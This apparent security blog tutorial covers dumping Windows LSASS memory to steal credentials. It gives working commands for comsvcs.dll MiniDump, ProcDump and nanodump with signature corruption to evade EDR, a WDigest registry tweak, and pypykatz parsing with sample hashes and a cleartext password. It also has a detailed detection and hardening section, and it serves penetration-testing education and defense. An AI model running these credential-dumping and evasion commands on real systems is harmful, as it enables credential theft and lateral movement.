Dumping LSASS Memory: Techniques and Detection Evasion

Windows Privesc
2026.04.18
Time it takes to read this article 5 minutes.

Introduction / Overview

Disclaimer: This article is for education and authorized security testing only. Dumping LSASS memory extracts credentials belonging to other users and is a high-impact action. Only perform these techniques on systems you own or have explicit written permission to test. Unauthorized credential access is a crime in most jurisdictions.

The Local Security Authority Subsystem Service (lsass.exe) is the heart of Windows authentication. It caches secrets in memory: NTLM hashes, Kerberos tickets, and — depending on configuration — cleartext passwords. For an attacker who has already gained local administrator or SYSTEM on a host, dumping LSASS is one of the fastest paths to lateral movement and domain dominance.

In this article you'll learn four reliable ways to produce an LSASS dump — the LOLBin comsvcs.dll MiniDump export, Sysinternals ProcDump, the EDR-evasive nanodump, and offline parsing with pypykatz — and, just as importantly, how a blue team detects and blocks each one. This maps to MITRE ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory).

How it works / Background

When a user authenticates interactively, LSASS loads several Security Support Providers (SSPs) such as wdigest, kerberos, tspkg, and msv1_0. These SSPs hold credential material in the process's address space so the OS can perform single sign-on. Mimikatz and its descendants don't exploit a vulnerability — they simply read this memory.

There are two stages to every attack:

  1. Acquisition — create a full memory image of lsass.exe. This requires the SeDebugPrivilege (granted to local admins) and read access to the process. The Windows API call underneath nearly all tools is MiniDumpWriteDump from dbghelp.dll.
  2. Extraction — parse the resulting .dmp offline (ideally on the attacker's machine) to recover secrets. Doing the parse offline avoids running a flagged tool like mimikatz.exe on the target.

Modern Windows complicates stage 1 with Credential Guard (VBS-isolated LSA secrets), RunAsPPL (LSASS as a Protected Process Light), and EDR sensors that hook MiniDumpWriteDump and watch for handles opened against lsass.exe.

Prerequisites / Lab setup

  • A Windows 10/11 or Server 2019+ VM where you are an administrator.
  • A second domain user logged on interactively (so there are extra credentials to recover).
  • An attacker box (Kali/Linux) with pip install pypykatz.

For a realistic lab, leave Credential Guard off initially and enable it later to observe the difference. To repopulate cleartext WDigest credentials (legacy, off by default since Server 2012 R2):

# Lab only - re-enables cleartext password caching in LSASS
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" `
  /v UseLogonCredential /t REG_DWORD /d 1 /f

Log off and back on for the change to take effect.

Attack walkthrough / PoC

1. comsvcs.dll MiniDump (living off the land)

comsvcs.dll ships with every Windows install and exports a MiniDump function callable via rundll32. No tool needs to be dropped.

# Get the LSASS PID
$pid = (Get-Process lsass).Id

# rundll32 comsvcs.dll, MiniDump  <PID> <outfile> full
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $pid C:\temp\lsass.dmp full

The arguments are positional: PID, output path, and the literal keyword full. This LOLBin technique is heavily signatured today, but it remains useful because nothing is written to disk except the dump itself.

2. ProcDump (signed Microsoft binary)

ProcDump is signed by Microsoft, so it often slips past application allow-listing. The -ma flag writes a full memory dump.

procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp

Some EDRs block by process name, so dumping by PID can help:

procdump.exe -accepteula -ma (Get-Process lsass).Id C:\temp\lsass_pid.dmp

3. nanodump (evasive, in-memory)

nanodump is a Beacon Object File / standalone PE that reimplements the minidump format without calling MiniDumpWriteDump, avoiding the most common EDR hook. It can also clone the LSASS handle, use a duplicated handle, or write an invalid/corrupted minidump signature that you fix up offline to defeat signature scanning.

# Standalone build: write a dump with a corrupted signature
nanodump.exe --write C:\temp\report.docx

Restore the valid signature on the attacker box before parsing:

python3 restore_signature.py report.docx

The --fork option dumps a forked clone of the process and --valid writes a normal signature if evasion isn't needed.

4. Parse offline with pypykatz

Move the dump to your Linux box and parse it without ever running Mimikatz on the target:

pypykatz lsa minidump lsass.dmp

Typical output includes the msv (NT hash), wdigest, and kerberos sections:

== LogonSession ==
authentication_id 184639
username CORP\jdoe
== MSV ==
        Username: jdoe
        NThash: 8846f7eaee8fb117ad06bdd830b7586c
== WDigest [00050cf2]==
        password: SuperSecret123!

Feed the recovered NT hash straight into a pass-the-hash workflow — see my notes on Pass-the-Hash and lateral movement and Kerberoasting for what to do next.

Mermaid diagram

Dumping LSASS Memory: Techniques and Detection Evasion diagram 1

Diagram: an admin acquires debug rights, opens an LSASS handle, dumps memory via one of three methods, then parses it offline with pypykatz to harvest credentials for lateral movement.

Detection & Defense (Blue Team)

Defense must address both prevention (stop the dump) and detection (catch the attempt).

Prevention

  • Enable RunAsPPL. Running LSASS as a Protected Process Light blocks unprotected processes from opening a read handle, defeating ProcDump and comsvcs.dll outright (attackers then need a vulnerable signed driver — BYOVD — to strip protection).

    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" `
  /v RunAsPPL /t REG_DWORD /d 1 /f

  • Enable Credential Guard (VBS) so LSA secrets live in an isolated trustlet (lsaiso.exe). Dumps then contain no usable plaintext or reusable hashes for protected sessions.

  • Disable WDigest by ensuring UseLogonCredential is 0 (the default) so cleartext passwords are not cached.

  • Microsoft Defender Attack Surface Reduction (ASR) rule "Block credential stealing from the Windows local security authority subsystem" (GUID 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) blocks the read of LSASS memory.

    Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 `
  -AttackSurfaceReductionRules_Actions Enabled

Detection

  • Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe with access masks containing 0x1010 / 0x1410 / 0x1438 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) is the strongest single signal. SwiftOnSecurity's Sysmon config flags this by default.
  • Windows Security Event 4656/4663 with object \Device\...\lsass.exe when SACL auditing is enabled.
  • Hunt for rundll32.exe command lines containing comsvcs and MiniDump, and for procdump usage with -ma.
  • Alert on new .dmp files (or oddly named files like report.docx that are actually MDMP) written by suspicious processes.
  • Watch for handle duplication and direct system calls — nanodump's hallmark is reading LSASS without the usual dbghelp call stack, so behavioral EDR rules that baseline the call stack of memory reads catch it where signature rules fail.

A layered approach (RunAsPPL + Credential Guard + ASR + Sysmon ID 10) raises the cost dramatically: the attacker is forced into BYOVD or kernel-level tradecraft that is itself noisy.

Conclusion

LSASS dumping remains a top-tier credential-access technique because the secrets are right there in memory by design. On the offensive side, success is mostly about evasion: choosing a method (LOLBin, signed binary, or MiniDumpWriteDump-free nanodump) that your target's EDR doesn't catch, then parsing offline so Mimikatz never touches disk. On the defensive side, RunAsPPL and Credential Guard turn an easy win into a hard, loud operation, and Sysmon Event ID 10 makes the attempt visible even when prevention is incomplete. Test both sides in your lab — understanding detection is what makes you a better operator.

References

Comments

Copied title and URL